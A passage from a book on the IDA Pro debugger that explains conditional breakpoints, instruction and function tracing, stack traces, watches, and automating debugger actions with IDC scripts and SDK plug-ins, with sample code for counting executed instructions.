debugger feature, not an instruction set or CPU feature. When a breakpoint

is triggered, it is the debugger’s job to evaluate any associated conditional

expression and determine whether the program should be paused (the con-

dition is met) or whether execution should simply continue (the condition is

not met). Therefore, conditions may be specified for both software and hard-

ware breakpoints.

IDA breakpoint conditions are specified using IDC (not Python) expres-

sions. Expressions that evaluate to non-zero are considered true, satisfying

the breakpoint condition and triggering the breakpoint. Expressions that

evaluate to zero are considered false, failing to satisfy the breakpoint condi-

tion and failing to trigger the associated breakpoint. In order to assist in the

creation of breakpoint expressions, IDA makes special register variables avail-

able within IDC (again, not Python) to provide direct access to register con-

tents in breakpoint expressions. These variables are named after the registers

themselves and include EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP, EFL, AX, BX, CX, DX, SI,

DI, BP, SP, AL, AH, BL, BH, CL, CH, DL, and DH. These register variables are accessible

only when the debugger is active.
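The smaller register variables are simply views onto portions of the corresponding 32-bit register. As a reminder of how they relate, here is a short Python sketch (plain arithmetic, not IDC and not IDA code; the function name is made up for this example) that derives AX, AL, and AH from a value held in EAX.

```python
def subregisters(eax):
    """Return the x86 sub-register views of a 32-bit EAX value."""
    eax &= 0xFFFFFFFF
    ax = eax & 0xFFFF              # low 16 bits
    return {
        "EAX": eax,
        "AX": ax,
        "AL": ax & 0xFF,           # low byte of AX
        "AH": (ax >> 8) & 0xFF,    # high byte of AX
    }


views = subregisters(0x12345678)
```

The same relationships hold for EBX, ECX, and EDX and their 16-bit and 8-bit counterparts.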

Unfortunately, no variables exist that allow direct access to the proc-

essor flag bits. In order to access individual CPU flags, you need to call the

GetRegValue function to obtain the value of the desired flag bit, such as CF.

If you need a reminder regarding valid register and flag names, refer to the

labels along the left and right edges of the General Registers window. A few

example breakpoint expressions are shown here:

EAX == 100 // break if eax holds the value 100

ESI > EDI // break if esi is greater than edi

Dword(EBP-0x20) == 10 // Read current stack frame (var_20) and compare to 10

GetRegValue("ZF") // break if zero flag is set

EAX = 1 // Set EAX to 1, this also evaluates to true (non-zero)

EIP = 0x0804186C // Change EIP, perhaps to bypass code

Two things to note about breakpoint expressions are the fact that IDC

functions may be called to access process information (as long as the func-

tion returns a value) and the fact that assignment can be used as a means of

modifying register values at specific locations during process execution. Ilfak himself demonstrated this technique as an example of overriding a function return value.[8]

7. See http://www.intel.com/products/processor/manuals/.

8. See http://www.hexblog.com/2005/11/simple_trick_to_hide_ida_debug.html and http://www.hexblog.com/2005/11/stealth_plugin_1.html.

The last breakpoint options that can be configured in the Breakpoint

Settings dialog are grouped into the Actions box on the right side of the dia-

log. The Break checkbox specifies whether program execution should actually

be paused (assuming any associated condition is true) when the breakpoint

is reached. It may seem unusual to create a breakpoint that doesn’t break,

but this is actually a useful feature if all you want to do is modify a specific

memory or register value each time an instruction is reached without requir-

ing the program to be paused at the same time. Selecting the Trace check-

box causes a trace event to be logged each time the breakpoint is hit.
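The interaction among the Enabled, Condition, Break, and Trace settings can be modeled as a small decision function. The Python sketch below is an interpretation of the behavior described in this section, not IDA code: the Breakpoint class and on_hit function are hypothetical, conditions are written as Python callables rather than IDC expressions, and logging a trace event only when the condition holds is an assumption.

```python
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass
class Breakpoint:
    address: int
    condition: Optional[Callable[[Dict[str, int]], int]] = None
    enabled: bool = True
    do_break: bool = True      # the Break checkbox
    do_trace: bool = False     # the Trace checkbox


def on_hit(bp, regs, trace_log):
    """Return True if the debugger should pause the process."""
    if not bp.enabled:
        return False                       # disabled breakpoints are ignored
    if bp.condition is not None and not bp.condition(regs):
        return False                       # condition false: resume silently
    if bp.do_trace:
        trace_log.append(bp.address)
    return bp.do_break


def force_eax(regs):
    """Counterpart of the IDC expression 'EAX = 1': assign, then yield the value."""
    regs["EAX"] = 1
    return regs["EAX"]


log = []
regs = {"EAX": 0}
patcher = Breakpoint(0x0804186C, condition=force_eax, do_break=False, do_trace=True)
paused_by_patcher = on_hit(patcher, regs, log)

conditional = Breakpoint(0x0804186C, condition=lambda r: r["EAX"] == 100)
paused_when_false = on_hit(conditional, {"EAX": 1}, log)
paused_when_true = on_hit(conditional, {"EAX": 100}, log)
```

The first breakpoint never pauses the process, yet it rewrites EAX every time it is reached, which is the nonbreaking use described above.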

Tracing

Tracing offers a means of logging specific events that occur while a process is executing. Trace events are logged to a fixed-size trace buffer and may optionally be logged to a trace file. Two styles of tracing are available: instruction tracing and function tracing. When instruction tracing is enabled (Debugger ▸ Tracing ▸ Instruction Tracing), IDA records the address, the instruction, and the values of any registers (other than EIP) that were changed by the instruction. Instruction tracing can slow down a debugged process considerably, because the debugger must single-step the process in order to monitor and record all register values. Function tracing (Debugger ▸ Tracing ▸ Function Tracing) is a subset of instruction tracing in which only function calls (and optionally returns) are logged. No register values are logged for function trace events.

Three types of individual trace events are also available: write traces,

read/write traces, and execution traces. As their names imply, each allows

logging of a trace event when a specific action occurs at a designated address.

Each of these individual traces is implemented using nonbreaking breakpoints

with the trace option set. Write and read/write traces are implemented using

hardware breakpoints and thus fall under the same restrictions mentioned

previously for hardware breakpoints, the most significant being that no more

than four hardware-assisted breakpoints or traces may be active at any given

time. By default, execution traces are implemented using software break-

points, and thus there is no limit on the number of execution traces that can

be set within a program.

Figure 24-10 shows the Tracing Options (Debugger ▸ Tracing ▸ Tracing Options) dialog used to configure the debugger’s tracing operations.

Options specified here apply to function and instruction tracing only.

These options have no effect on individual trace events. The Trace buffer

size option specifies the maximum number of trace events that may be dis-

played at any given time. For a given buffer size n, only the n most recent

trace events are displayed. Naming a log file causes all trace events to be

appended to the named file. A file dialog is not offered when specifying a

log file, so you must specify the complete path to the log file yourself. An IDC

expression may be entered as a stop condition. The condition is evaluated

prior to tracing through each instruction. If the condition evaluates to true,

execution is immediately paused. The effect of this expression is to act as a

conditional breakpoint that is not tied to any specific location.
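The combined effect of a bounded trace buffer and a stop condition can be sketched with a fixed-length queue. The Python below is a model under stated assumptions, not IDA code: run_trace is a hypothetical function, each trace event is represented as a dictionary of register values, and the stop condition is a Python callable standing in for an IDC expression.

```python
from collections import deque


def run_trace(events, buffer_size, stop_condition=None):
    """Trace events in order, keeping only the buffer_size most recent.

    The stop condition is checked before each instruction is traced; when it
    evaluates to true, tracing halts as if the process had been paused.
    """
    buffer = deque(maxlen=buffer_size)   # old events fall off the front
    for regs in events:
        if stop_condition is not None and stop_condition(regs):
            break
        buffer.append(regs)
    return list(buffer)


# Six instructions with ECX counting down from 5 to 0.
events = [{"EIP": 0x401000 + i, "ECX": 5 - i} for i in range(6)]

recent = run_trace(events, buffer_size=3)
stopped = run_trace(events, buffer_size=3,
                    stop_condition=lambda r: r["ECX"] == 1)
```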


Figure 24-10: The Tracing Options dialog

The Mark consecutive traced events with same IP option, when checked, causes consecutive trace events originating from the same instruction (IP here means Instruction Pointer) to be flagged with an equal sign. An example in which consecutive events can originate at the same instruction address occurs when the REP[9] prefix is used in x86 programs. In order for an instruction trace to show each repetition at the same instruction address, the Log if same IP option must also be selected. Without this option selected, an instruction prefixed with REP is listed only once each time it is encountered. The following listing shows a partial instruction trace using the default trace settings:

Thread Address Instruction Result

------ ------- ----------- ------

① 00000150 .text:sub_401320+17 rep movsb ECX=00000000 ESI=0022FE2C EDI=0022FCF4

00000150 .text:sub_401320+19 pop esi ESI=00000000 ESP=0022FCE4

Note that the movsb instruction ① is listed only once.

In the following listing, Log if same IP has been selected, resulting in

each iteration of the rep loop being logged:

Thread Address Instruction Result

------ ------- ----------- ------

000012AC .text:sub_401320+17 rep movsb ECX=0000000B ESI=0022FE21 EDI=0022FCE9 EFL=00010206 RF=1

000012AC .text:sub_401320+17 rep movsb ECX=0000000A ESI=0022FE22 EDI=0022FCEA

000012AC .text:sub_401320+17 rep movsb ECX=00000009 ESI=0022FE23 EDI=0022FCEB

000012AC .text:sub_401320+17 rep movsb ECX=00000008 ESI=0022FE24 EDI=0022FCEC

000012AC .text:sub_401320+17 rep movsb ECX=00000007 ESI=0022FE25 EDI=0022FCED

000012AC .text:sub_401320+17 rep movsb ECX=00000006 ESI=0022FE26 EDI=0022FCEE

000012AC .text:sub_401320+17 rep movsb ECX=00000005 ESI=0022FE27 EDI=0022FCEF

000012AC .text:sub_401320+17 rep movsb ECX=00000004 ESI=0022FE28 EDI=0022FCF0

000012AC .text:sub_401320+17 rep movsb ECX=00000003 ESI=0022FE29 EDI=0022FCF1

000012AC .text:sub_401320+17 rep movsb ECX=00000002 ESI=0022FE2A EDI=0022FCF2

000012AC .text:sub_401320+17 rep movsb ECX=00000001 ESI=0022FE2B EDI=0022FCF3

000012AC .text:sub_401320+17 rep movsb ECX=00000000 ESI=0022FE2C EDI=0022FCF4 EFL=00000206 RF=0

000012AC .text:sub_401320+19 pop esi ESI=00000000 ESP=0022FCE4

9. The REP prefix is an instruction modifier that causes certain x86 string instructions such as movs and scas to be repeated based on a count contained in the ECX register.

Finally, in the following listing, the Mark consecutive traced events with

same IP option has been enabled, resulting in special markings that high-

light the fact that the instruction pointer has not changed from one instruc-

tion to the next:

Thread Address Instruction Result

------ ------- ----------- ------

000017AC .text:sub_401320+17 rep movsb ECX=0000000B ESI=0022FE21 EDI=0022FCE9 EFL=00010206 RF=1

= = = ECX=0000000A ESI=0022FE22 EDI=0022FCEA

= = = ECX=00000009 ESI=0022FE23 EDI=0022FCEB

= = = ECX=00000008 ESI=0022FE24 EDI=0022FCEC

= = = ECX=00000007 ESI=0022FE25 EDI=0022FCED

= = = ECX=00000006 ESI=0022FE26 EDI=0022FCEE

= = = ECX=00000005 ESI=0022FE27 EDI=0022FCEF

= = = ECX=00000004 ESI=0022FE28 EDI=0022FCF0

= = = ECX=00000003 ESI=0022FE29 EDI=0022FCF1

= = = ECX=00000002 ESI=0022FE2A EDI=0022FCF2

= = = ECX=00000001 ESI=0022FE2B EDI=0022FCF3

= = = ECX=00000000 ESI=0022FE2C EDI=0022FCF4 EFL=00000206 RF=0

000017AC .text:sub_401320+19 pop esi ESI=00000000 ESP=0022FCE4
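The marking seen in the preceding listing can be reproduced with a simple pass over the trace events. The Python sketch below is an illustration only: mark_same_ip is a hypothetical function, events are modeled as (thread, address, instruction, result) tuples, and comparing addresses alone (rather than thread and address together) is an assumption.

```python
def mark_same_ip(events):
    """Replace repeated thread/address/instruction columns with '='."""
    rows = []
    previous_address = None
    for thread, address, instruction, result in events:
        if address == previous_address:
            rows.append(("=", "=", "=", result))
        else:
            rows.append((thread, address, instruction, result))
        previous_address = address
    return rows


events = [
    ("000017AC", ".text:sub_401320+17", "rep movsb", "ECX=00000002"),
    ("000017AC", ".text:sub_401320+17", "rep movsb", "ECX=00000001"),
    ("000017AC", ".text:sub_401320+17", "rep movsb", "ECX=00000000"),
    ("000017AC", ".text:sub_401320+19", "pop esi", "ESI=00000000"),
]
marked = mark_same_ip(events)
```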

The last two options we will mention concerning tracing are Trace over

debugger segments and Trace over library functions. When Trace over debug-

ger segments is selected, instruction and function call tracing is temporarily

disabled anytime execution proceeds to a program segment outside any of

the file segments originally loaded into IDA. The most common example of

this is a call to a shared library function. Selecting Trace over library func-

tions temporarily disables function and instruction tracing anytime execu-

tion enters a function that IDA has identified as a library function (perhaps

via FLIRT signature matching). Library functions linked into a binary should

not be confused with library functions that a binary accesses via a shared library

file such as a DLL. Both of these options are enabled by default, resulting in

better performance while tracing (because the debugger does not need to

step into library code) as well as a substantial reduction in the number of

trace events generated, since instruction traces through library code can

rapidly fill the trace buffer.

Stack Traces

A stack trace is a display of the current call stack, or sequence of function calls

that have been made in order for execution to reach a particular location

within a binary. Figure 24-11 shows a sample stack trace generated using the

DebuggerStack Trace command.


Figure 24-11: A sample stack trace

The top line in a stack trace lists the name of the function currently exe-

cuting. The second line indicates the function that called the current func-

tion and the address from which that call was made. Successive lines indicate

the point from which each function was called. A debugger is able to create a

stack trace display by walking the stack and parsing each stack frame that it

encounters, and it typically relies on the contents of the frame pointer regis-

ter (EBP for x86) to locate the base of each stack frame. When a stack frame

is located, the debugger can extract a pointer to the next stack frame (the

saved frame pointer) as well as the saved return address, which is used to

locate the call instruction used to invoke the current function. IDA’s debug-

ger cannot trace through stack frames that do not utilize EBP as a frame

pointer. At the function (rather than individual instruction) level, stack

traces are useful for answering the question, “How did I get here?” or, more

correctly, “What sequence of function calls led to this particular location?”
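The frame-pointer walk described above can be sketched in Python against a toy memory model. This is a simplified illustration rather than IDA's algorithm: the function name walk_stack, the dictionary standing in for process memory, and every address shown are hypothetical. It assumes the conventional x86 layout in which [EBP] holds the caller's saved EBP and [EBP+4] holds the return address.

```python
def walk_stack(memory, ebp, eip, max_frames=64):
    """Return code addresses on the call stack, innermost first.

    memory maps addresses to 32-bit values. For each frame, memory[ebp]
    is the saved frame pointer and memory[ebp + 4] is the return address.
    """
    frames = [eip]
    while ebp in memory and len(frames) < max_frames:
        saved_ebp = memory[ebp]
        ret_addr = memory.get(ebp + 4)
        if ret_addr is None:
            break
        frames.append(ret_addr)
        # Caller frames live at higher addresses; stop on a broken chain.
        if saved_ebp <= ebp:
            break
        ebp = saved_ebp
    return frames


# Hypothetical stack contents for three nested calls.
memory = {
    0x0022FCE0: 0x0022FD10,  # saved EBP of the caller's frame
    0x0022FCE4: 0x00401245,  # return address into the caller
    0x0022FD10: 0x0022FD40,
    0x0022FD14: 0x004010F3,
    0x0022FD40: 0x00000000,  # a saved EBP of zero ends the chain
    0x0022FD44: 0x00401005,
}

for addr in walk_stack(memory, ebp=0x0022FCE0, eip=0x00401337):
    print("%08X" % addr)
```

If a function does not maintain EBP as a frame pointer, memory[ebp] no longer points at the caller's frame, and a walk of this kind either stops early or reports nonsense, which is the limitation noted above.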

Watches

While debugging a process, you may wish to constantly monitor the value

contained in one or more variables. Rather than requiring you to navigate

to the desired memory locations each time the process is paused, many debug-

gers allow you to specify lists of memory locations whose values should be dis-

played each time the process is stopped in the debugger. Such lists are called

watch lists, because they allow you to watch as the contents of designated

memory locations change during program execution. Watch lists are simply

a navigational convenience; they do not cause execution to pause like a

breakpoint.

Because they are focused on data, watch points (addresses designated

to be watched) are most commonly set in the stack, heap, or data sections

of a binary. Watches are set in the IDA debugger by right-clicking a memory

item of interest and selecting Add Watch. Determining exactly which address

to set a watch on may require some thought. Determining the address of a

global variable is somewhat less challenging than determining the address

of a local variable because global variables are allocated and assigned fixed

addresses at compile time. Local variables, on the other hand, don’t exist

until runtime, and even then they exist only once the function in which they

are declared has been called. With the debugger active, once you have

stepped into a function, IDA is capable of reporting the addresses of local

variables within that function. Figure 24-12 shows the result of mousing over

a local variable named arg_0 (actually a parameter passed into the function).


Figure 24-12: Debugger resolution of a local variable address

Double-clicking a local variable within an active function causes IDA to

jump the main IDA View window to the address of that local variable. Having

arrived at the variable’s address, you may then add a watch on that address

using the Add Watch context-sensitive menu option, though you will need

to manually enter the address into the Watch Address dialog. If, instead,

you take the time to name the memory location, IDA will automatically add

a watch if you apply the same menu option to the name rather than the

address.

You can access a list of all watches currently in effect via Debugger▸Watches▸Watch List. You can delete individual watches by highlighting the

desired watch in the watch list and pressing DELETE.

Automating Debugger Tasks

In Chapters 15 through 19, we covered the basics of IDA scripting and the

IDA SDK and demonstrated the usefulness of these capabilities during static

analysis of binaries. Launching a process and working in the more dynamic

environment of a debugger doesn’t make scripting and plug-ins any less

useful. Interesting uses for the automation provided by scripts and plug-ins

include analyzing runtime data available while a process is being debugged,

implementing complex breakpoint conditions, and implementing measures

to subvert anti-debugging techniques.

Scripting Debugger Actions

All of the IDA scripting capabilities discussed in Chapter 15 continue to be

accessible when you are using the IDA debugger. Scripts may be launched

from the File menu, associated with hotkeys, and invoked from the IDA

scripting command line. In addition, user-created IDC functions may be ref-

erenced from breakpoint conditions and tracing termination expressions.

Basic scripting functions offer the capability to set, modify, and enumer-

ate breakpoints and the ability to read and write register and memory values.

Memory access is provided by the DbgByte, PatchDbgByte, DbgWord, PatchDbgWord,

DbgDword, and PatchDbgDword functions (analogous to the Byte, Word, Dword, and

PatchXXX functions described in Chapter 15). Register and breakpoint manip-

ulation is made possible by the following functions (please see the IDA help

file for a complete list).

long GetRegValue(string reg)

Returns the value of the named register, such as EAX, as discussed previ-

ously. In IDC only, register values may also be easily accessed by using

the desired register’s name as a variable within an IDC expression.


bool SetRegValue(number val, string name)

Sets the value of the named register, such as EAX. If you are using IDC, register values may also be modified directly by using the desired register name on the left side of an assignment statement.

bool AddBpt(long addr)

Adds a software breakpoint at the indicated address.

bool AddBptEx(long addr, long size, long type)

Adds a breakpoint of the specified size and type at the indicated address.

Type should be one of the BPT_xxx constants described in idc.idc or the

IDA help file.

bool DelBpt(long addr)

Deletes a breakpoint at the specified address.

long GetBptQty()

Returns the number of breakpoints set within a program.

long GetBptEA(long bpt_num)

Returns the address at which the indicated breakpoint is set.

long/string GetBptAttr(long addr, number attr)

Returns an attribute associated with the breakpoint at the indicated

address. The return value may be a number or a string depending on

which attribute value has been requested. Attributes are specified using

one of the BPTATTR_xxx values described in idc.idc or the IDA help file.

bool SetBptAttr(long addr, number attr, long value)

Sets the specified attribute of the specified breakpoint to the specified

value. Do not use this function to set breakpoint condition expressions

(use SetBptCnd instead).

bool SetBptCnd(long addr, string cond)

Sets the breakpoint condition to the provided conditional expression,

which must be a valid IDC expression.

long CheckBpt(long addr)

Gets the breakpoint status at the specified address. Return values indi-

cate whether there is no breakpoint, the breakpoint is disabled, the

breakpoint is enabled, or the breakpoint is active. An active breakpoint

is a breakpoint that is enabled while the debugger is also active.

The following script demonstrates how to install a custom IDC breakpoint-

handling function at the current cursor location:

#include <idc.idc>

/*
 * The following should return 1 to break, and 0 to continue execution.
 */
static my_breakpoint_condition() {
   return AskYN(1, "my_breakpoint_condition activated, break now?") == 1;
}

/*
 * This function is required to register my_breakpoint_condition
 * as a breakpoint conditional expression
 */
static main() {
   auto addr;
   addr = ScreenEA();
   AddBpt(addr);
   SetBptCnd(addr, "my_breakpoint_condition()");
}

The complexity of my_breakpoint_condition is entirely up to you. In this

example, each time the breakpoint is hit, a dialog will be displayed asking the

user if she would like to continue execution of the process or pause at the

current location. The value returned by my_breakpoint_condition is used by

the debugger to determine whether the breakpoint should be honored or

ignored.
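To make the honored-or-ignored decision concrete, here is a small Python model of a breakpoint table with optional conditions. It is a sketch only: in IDA the condition is an IDC expression string evaluated by the debugger, whereas this model assumes a Python callable, and the Breakpoints class, its method names, and the addresses are all hypothetical.

```python
class Breakpoints:
    """Toy breakpoint table: address -> optional condition callable."""

    def __init__(self):
        self._conditions = {}

    def add(self, addr, condition=None):
        """Register a breakpoint; condition=None means always break."""
        self._conditions[addr] = condition

    def should_break(self, addr, registers):
        """Return True if execution should pause at addr."""
        if addr not in self._conditions:
            return False              # no breakpoint here
        cond = self._conditions[addr]
        if cond is None:
            return True               # unconditional breakpoint
        return bool(cond(registers))  # nonzero result honors the breakpoint


bpts = Breakpoints()
bpts.add(0x401337)                                           # unconditional
bpts.add(0x401400, condition=lambda regs: regs["EAX"] == 0)  # break only if EAX is 0

print(bpts.should_break(0x401400, {"EAX": 5}))
print(bpts.should_break(0x401400, {"EAX": 0}))
```

The design mirrors the rule stated above: the condition is consulted each time the breakpoint address is reached, and only its return value decides whether the process is paused.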

Programmatic control of the debugger is possible from both the SDK

and through the use of scripts. Within the SDK, IDA utilizes an event-driven

model and provides callback notifications to plug-ins when specific debugger

events occur. Unfortunately, IDA’s scripting capabilities don’t facilitate the

use of an event-driven paradigm within scripts. As a result, Hex-Rays intro-

duced a number of scripting functions that allow for synchronous control of

the debugger from within scripts. The basic approach required to drive the

debugger using a script is to initiate a debugger action and then wait for the

corresponding debugger event code. Keep in mind that a call to a synchro-

nous debugger function (which is all you can do in a script) blocks all other

IDA operations until the call completes. The following list details several of

the debugging extensions available for scripts:

long GetDebuggerEvent(long wait_evt, long timeout)

Waits for a debugger event (as specified by wait_evt) to take place within

the specified number of seconds (–1 waits forever). Returns an event type

code that indicates the type of event that was received. Specify wait_evt

using a combination of one or more WFNE_xxx (WFNE stands for Wait For

Next Event) flags. Possible return values are documented in the IDA

help file.

bool RunTo(long addr)

Runs the process until the specified location is reached or until a break-

point is hit.

bool StepInto()

Steps the process one instruction, stepping into any function calls.

bool StepOver()

Steps the process one instruction, stepping over any function calls. This

call may terminate early if a breakpoint is hit.

bool StepUntilRet()

Runs until the current function call returns or until a breakpoint is hit.


bool EnableTracing(long trace_level, long enable)

Enables (or disables) the generation of trace events. The trace_level

parameter should be set to one of the TRACE_xxx constants defined in

idc.idc.

long GetEventXXX()

A number of functions are available for retrieving information related to

the current debug event. Some of these functions are valid only for spe-

cific event types. You should test the return value of GetDebuggerEvent in

order to make sure that a particular GetEventXXX function is valid.

GetDebuggerEvent must be called after each function that causes the pro-

cess to execute in order to retrieve the debugger’s event code. Failure to do

so may prevent follow-up attempts to step or run the process. For example,

the following code fragment will step the debugger only one time because

GetDebuggerEvent does not get called to clear the last event type in between

invocations of StepOver.

StepOver();

StepOver(); //this and all subsequent calls will fail

StepOver();

The proper way to perform an execution action is to follow up each call

with a call to GetDebuggerEvent, as shown in the following example:

StepOver();

GetDebuggerEvent(WFNE_SUSP, -1);

StepOver();

GetDebuggerEvent(WFNE_SUSP, -1);

StepOver();

GetDebuggerEvent(WFNE_SUSP, -1);

StepOver();

GetDebuggerEvent(WFNE_SUSP, -1);

The calls to GetDebuggerEvent allow execution to continue even if you

choose to ignore the return value from GetDebuggerEvent. The event type

WFNE_SUSP indicates that we wish to wait for an event that results in suspension

of the debugged process, such as an exception or a breakpoint. You may

have noticed that there is no function that simply resumes execution of a suspended process.[10] However, it is possible to achieve the same effect by using

the WFNE_CONT flag in a call to GetDebuggerEvent, as shown here:

GetDebuggerEvent(WFNE_SUSP | WFNE_CONT, -1);

This particular call waits for the next available suspend event after first

resuming execution by continuing the process from the current instruction.
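The requirement to collect each event before issuing the next execution request can be modeled with a toy debugger in Python. This sketch only mirrors the rule as described here; it makes no claim about how IDA tracks events internally, and the ToyDebugger class and its methods are hypothetical stand-ins for StepOver and GetDebuggerEvent.

```python
class ToyDebugger:
    """Model in which an execution request fails while an event is unread."""

    def __init__(self):
        self.ip = 0
        self._pending = None

    def step_over(self):
        if self._pending is not None:
            return False          # the previous event was never collected
        self.ip += 1
        self._pending = "STEP"
        return True

    def get_debugger_event(self):
        """Return the pending event (or None) and clear it."""
        event, self._pending = self._pending, None
        return event


# Three steps with no event collection: only the first succeeds.
naive_dbg = ToyDebugger()
naive = [naive_dbg.step_over() for _ in range(3)]

# Three steps, each followed by event collection: all succeed.
proper_dbg = ToyDebugger()
proper = []
for _ in range(3):
    proper.append(proper_dbg.step_over())
    proper_dbg.get_debugger_event()

print(naive, naive_dbg.ip)
print(proper, proper_dbg.ip)
```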

10. In reality, there is a macro named ResumeProcess that is defined as

GetDebuggerEvent(WFNE_CONT|WFNE_NOWAIT, 0).


Additional functions are provided for automatically launching the

debugger and attaching to running processes. See IDA’s help file for more

information on these functions.

An example of a simple debugger script for collecting statistics on the

addresses of each executed instruction (provided the debugger is enabled)

is shown here:

static main() {
   auto ca, code, addr, count, idx;
   ca = GetArrayId("stats");                                  // (1)
   if (ca != -1) {
      DeleteArray(ca);
   }
   ca = CreateArray("stats");
   EnableTracing(TRACE_STEP, 1);                              // (2)
   for (code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1); code > 0;
        code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1)) {  // (3)
      addr = GetEventEa();                                    // (4)
      count = GetArrayElement(AR_LONG, ca, addr) + 1;         // (5)
      SetArrayLong(ca, addr, count);                          // (6)
   }
   EnableTracing(TRACE_STEP, 0);
   for (idx = GetFirstIndex(AR_LONG, ca);                     // (7)
        idx != BADADDR;
        idx = GetNextIndex(AR_LONG, ca, idx)) {
      count = GetArrayElement(AR_LONG, ca, idx);
      Message("%x: %d\n", idx, count);
   }
   DeleteArray(ca);                                           // (8)
}

The script begins (1) by testing for the presence of a global array named stats. If one is found, the array is removed and re-created so that we can start with an empty array. Next (2), single-step tracing is enabled before entering a loop (3) to drive the single-stepping process. Each time a debug event is generated, the address of the associated event is retrieved (4), the current count for the associated address is retrieved from the global array and incremented (5), and the array is updated with the new count (6). Note that the instruction pointer is used as the index into the sparse global array, which saves time looking up the address in some other form of data structure. Once the process completes, a second loop (7) is used to retrieve and print all values from array locations that have valid values. In this case, the only array indexes that will have valid values represent addresses from which instructions were fetched. The script finishes off (8) by deleting the global array that was used to gather the statistics. Example output from this script is shown here:

401028: 1

40102b: 1

40102e: 2


401031: 2

401034: 2

401036: 1

40103b: 1
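The counting logic itself is independent of IDA and can be tried outside the debugger. The following Python sketch substitutes a Counter for the sparse global array and a hard-coded list for the stream of trace events; the address sequence is an assumption, chosen so that a three-instruction loop body runs twice and the counts match the sample output above.

```python
from collections import Counter


def count_addresses(trace):
    """Count how many times each address appears in an execution trace."""
    return Counter(trace)


# Hypothetical trace: 40102e..401034 form a loop body executed twice.
trace = [
    0x401028, 0x40102B,
    0x40102E, 0x401031, 0x401034,
    0x40102E, 0x401031, 0x401034,
    0x401036, 0x40103B,
]

counts = count_addresses(trace)
for addr in sorted(counts):
    print("%x: %d" % (addr, counts[addr]))
```

As with the sparse array, only addresses that were actually executed occupy an entry, so the report loop visits executed addresses and nothing else.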

A slight alteration of the preceding example can be used to gather statis-

tics on what types of instructions are executed during the lifetime of a pro-

cess. The following example shows the modifications required in the first

loop to gather instruction-type data rather than address data:

for (code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1); code > 0;
     code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1)) {
   addr = GetEventEa();
   mnem = GetMnem(addr);                  // (1)
   count = GetHashLong(ht, mnem) + 1;     // (2)
   SetHashLong(ht, mnem, count);          // (3)
}

Rather than attempting to classify individual opcodes, we choose to group instructions by mnemonics (1). Because mnemonics are strings, we make use of the hash-table feature of global arrays to retrieve the current count associated with a given mnemonic (2) and save the updated count (3) back into the correct hash table entry. Sample output from this modified script is shown here:

add: 18

and: 2

call: 46

cmp: 16

dec: 1

imul: 2

jge: 2

jmp: 5

jnz: 7

js: 1

jz: 5

lea: 4

mov: 56

pop: 25

push: 59

retn: 19

sar: 2

setnz: 3

test: 3

xor: 7

In Chapter 25 we will revisit the use of debugger-interaction capabilities

as a means to assist in de-obfuscating binaries.


Automating Debugger Actions with IDA Plug-ins

In Chapter 16 you learned that IDA’s SDK offers significant power for devel-

oping a variety of compiled extensions that can be integrated into IDA and

that have complete access to the IDA API. The IDA API offers a superset of

all the capabilities available in IDC, and the debugging extensions are no

exception. Debugger extensions to the API are declared in <SDKDIR>/

dbg.hpp and include C++ counterparts to all of the IDC functions discussed

thus far, along with a complete asynchronous debugger interface capability.

For asynchronous interaction, plug-ins gain access to debugger notifica-

tions by hooking the HT_DBG notification type (see loader.hpp). Debugger noti-

fications are declared in the dbg_notification_t enum found in dbg.hpp.

Within the debugger API, commands for interacting with the debugger

are typically defined in pairs, with one function used for synchronous inter-

action (as with scripts) and the second function used for asynchronous inter-

action. Generically, the synchronous form of a function is named COMMAND(),

and its asynchronous counterpart is named request_COMMAND(). The request_XXX

versions are used to queue debugger actions for later processing. Once you

finish queuing asynchronous requests, you must invoke the run_requests func-

tion to initiate processing of your request queue. As your requests are pro-

cessed, debugger notifications will be delivered to any callback functions that

you may have registered via hook_to_notification_point.
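The queue-then-run pattern can be illustrated with a short Python model. This is a deliberately simplified sketch: the RequestQueue class and its methods are hypothetical, and notifications are delivered immediately after each action here, whereas the real debugger delivers them as the corresponding debugger events occur.

```python
from collections import deque


class RequestQueue:
    """Toy model of queued debugger requests and notification callbacks."""

    def __init__(self):
        self._queue = deque()
        self._callbacks = []

    def hook(self, callback):
        """Register a callback to be notified as requests are processed."""
        self._callbacks.append(callback)

    def request(self, name, action):
        """Queue an action; nothing executes until run_requests is called."""
        self._queue.append((name, action))

    def run_requests(self):
        """Process queued requests in order, notifying every callback."""
        while self._queue:
            name, action = self._queue.popleft()
            action()
            for callback in self._callbacks:
                callback(name)


log = []
rq = RequestQueue()
rq.hook(lambda name: log.append("notified: " + name))
rq.request("enable_step_trace", lambda: log.append("ran: enable_step_trace"))
rq.request("step_until_ret", lambda: log.append("ran: step_until_ret"))

queued_only = list(log)   # still empty: requests are queued, not executed
rq.run_requests()
print(log)
```

The point of the model is the ordering guarantee: requests run in the order they were queued, and nothing happens at all until the queue is explicitly run.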

Using asynchronous notifications, we can develop an asynchronous ver-

sion of the address-counting script from the previous section. The first task is

to make sure that we hook and unhook debugger notifications. We will do

this in the plug-in’s init and term methods, as shown here:

//A netnode to gather stats into
netnode stats("$ stats", 0, true);   // (1)

int idaapi init(void) {
   hook_to_notification_point(HT_DBG, dbg_hook, NULL);
   return PLUGIN_KEEP;
}

void idaapi term(void) {
   unhook_from_notification_point(HT_DBG, dbg_hook, NULL);
}

Note that we have also elected to declare a global netnode (1), which we will use to collect statistics. Next we consider what we want the plug-in to do when it is activated via its assigned hotkey. Our example plug-in run function is shown here:

void idaapi run(int arg) {
   stats.altdel();                //clear any existing stats
   request_enable_step_trace();   // (1)
   request_step_until_ret();      // (2)
   run_requests();                // (3)
}

Since we are using asynchronous techniques in this example, we must first submit a request to enable step tracing (1) and then submit a request to resume execution of the process being debugged. For the sake of simplicity, we will gather statistics on the current function only, so we will issue a request to run until the current function returns (2). With our requests properly queued, we kick things off by invoking run_requests to process the current request queue (3).

All that remains is to process the notifications that we expect to receive

by creating our HT_DBG callback function. A simple callback that processes

only two messages is shown here:

int idaapi dbg_hook(void *user_data, int notification_code, va_list va) {
   switch (notification_code) {
      case dbg_trace: {   // (1) notification arguments are detailed in dbg.hpp
         va_arg(va, thid_t);
         ea_t ea = va_arg(va, ea_t);                // (2)
         //increment the count for this address
